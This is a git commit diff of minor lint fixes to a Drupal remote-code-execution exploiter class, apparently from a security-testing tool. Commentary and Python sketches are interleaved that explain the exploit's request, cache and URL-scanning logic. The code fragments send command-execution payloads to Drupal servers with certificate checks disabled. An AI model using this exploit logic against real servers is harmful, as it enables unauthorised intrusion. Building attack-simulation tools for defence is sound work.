Merge pull request #824 from guardicore/minor-deadcode-deletion

minor fixes
Ophir Harpaz 2020-09-02 12:51:52 +03:00 committed by GitHub
commit 039a36c5ed
2 changed files with 6 additions and 7 deletions


@@ -72,7 +72,7 @@ script:
   ## Display the linter issues
   - cat flake8_warnings.txt
   ## Make sure that we haven't increased the amount of warnings.
-  - PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=90
+  - PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=80
   - if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi
   ## Check import order
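The lines above gate the build on the flake8 warning count: the last line of flake8_warnings.txt (presumably produced with flake8's --count option) is compared against PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT, which this commit lowers from 90 to 80. A rough Python sketch of the same check, shown only to illustrate the logic (the file name and limit are taken from the script, everything else is assumed):

from pathlib import Path
import sys

# Sketch of the CI gate: read the warning total that flake8 --count leaves on
# the last line of the report and fail if it exceeds the agreed upper limit.
PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT = 80

warning_total = int(Path("flake8_warnings.txt").read_text().strip().splitlines()[-1])
if warning_total > PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT:
    print("Too many python linter warnings! Failing this build.")
    sys.exit(1)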


@@ -21,7 +21,6 @@ LOG = logging.getLogger(__name__)
 class DrupalExploiter(WebRCE):
     _TARGET_OS_TYPE = ['linux', 'windows']
     _EXPLOITED_SERVICE = 'Drupal Server'
-    DRUPAL_PORTS = [[80, False], [443, True]]
 
     def __init__(self, host):
         super(DrupalExploiter, self).__init__(host)
@@ -73,7 +72,7 @@ class DrupalExploiter(WebRCE):
         """
         payload = build_exploitability_check_payload(url)
-        response = requests.get(f'{url}?_format=hal_json',
+        response = requests.get(f'{url}?_format=hal_json',  # noqa: DUO123
                                 json=payload,
                                 headers={"Content-Type": "application/hal+json"},
                                 verify=False)
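The only change in this hunk is the trailing `# noqa: DUO123`, which appears to silence the dlint/flake8 warning raised for `requests` calls that disable certificate verification; the request itself is unchanged. A minimal, self-contained sketch of the same pattern, with a placeholder target instead of the exploiter's real URL and payload:

import requests
import urllib3

# Placeholder target; the real exploiter builds the URL and JSON payload itself.
TARGET = 'https://192.0.2.1/node/1'

# Silence urllib3's runtime warning about unverified HTTPS, mirroring the
# intent of the inline noqa that silences the static-analysis warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

response = requests.get(f'{TARGET}?_format=hal_json',  # noqa: DUO123
                        headers={"Content-Type": "application/hal+json"},
                        verify=False)
print(response.status_code)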
@@ -90,11 +89,11 @@ class DrupalExploiter(WebRCE):
         base = remove_port(url)
         payload = build_cmd_execution_payload(base, cmd)
-        r = requests.get(f'{url}?_format=hal_json',
+        r = requests.get(f'{url}?_format=hal_json',  # noqa: DUO123
                          json=payload,
                          headers={"Content-Type": "application/hal+json"},
                          verify=False)
         if is_response_cached(r):
             LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
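`is_response_cached` is a helper defined elsewhere in the module, outside this diff. Purely as a hypothetical illustration of the kind of check the log message implies (a cache HIT meaning the command may never have reached the Drupal backend), such a helper might inspect the caching headers of the reply:

import requests

def is_response_cached(response: requests.Response) -> bool:
    # Hypothetical sketch only; the header names here are assumptions,
    # not the module's actual implementation.
    cache_header = response.headers.get('X-Drupal-Cache', '') or response.headers.get('X-Cache', '')
    return 'HIT' in cache_header.upper()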
@@ -111,7 +110,7 @@ class DrupalExploiter(WebRCE):
         :return: vulnerable URL to exploit
         """
         return self.vulnerable_urls.pop()
 
     def are_vulnerable_urls_sufficient(self):
         """
         For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
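The docstring above states the requirement (five distinct URLs for the full attack); under that assumption, and with an invented constant name and standalone signature, the sufficiency check boils down to a simple length comparison:

# Sketch only: the constant name and the free-function form are assumptions
# made for illustration; the real method lives on the exploiter class.
NUM_URLS_NEEDED_FOR_FULL_EXPLOIT = 5

def are_vulnerable_urls_sufficient(vulnerable_urls: set) -> bool:
    return len(vulnerable_urls) >= NUM_URLS_NEEDED_FOR_FULL_EXPLOIT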
@@ -137,7 +136,7 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
     articles = set()
     while lower < upper:
         node_url = urljoin(base_url, str(lower))
-        response = requests.get(node_url, verify=False)
+        response = requests.get(node_url, verify=False)  # noqa: DUO123
         if response.status_code == 200:
             if is_response_cached(response):
                 LOG.info(f'Found a cached article at: {node_url}, skipping')
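`find_exploitbale_article_ids` (the spelling is the module's own) walks candidate node IDs under the base URL and keeps those that answer with HTTP 200 and are not served from cache. A condensed, self-contained sketch of that loop, reusing the hypothetical cache check sketched earlier:

from urllib.parse import urljoin
import logging

import requests

LOG = logging.getLogger(__name__)

def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set:
    # Condensed sketch of the loop shown in the hunk above, not the module's
    # exact code; is_response_cached is the hypothetical helper from earlier.
    articles = set()
    while lower < upper:
        node_url = urljoin(base_url, str(lower))
        response = requests.get(node_url, verify=False)  # noqa: DUO123
        if response.status_code == 200:
            if is_response_cached(response):
                LOG.info(f'Found a cached article at: {node_url}, skipping')
            else:
                articles.add(lower)
        lower += 1
    return articles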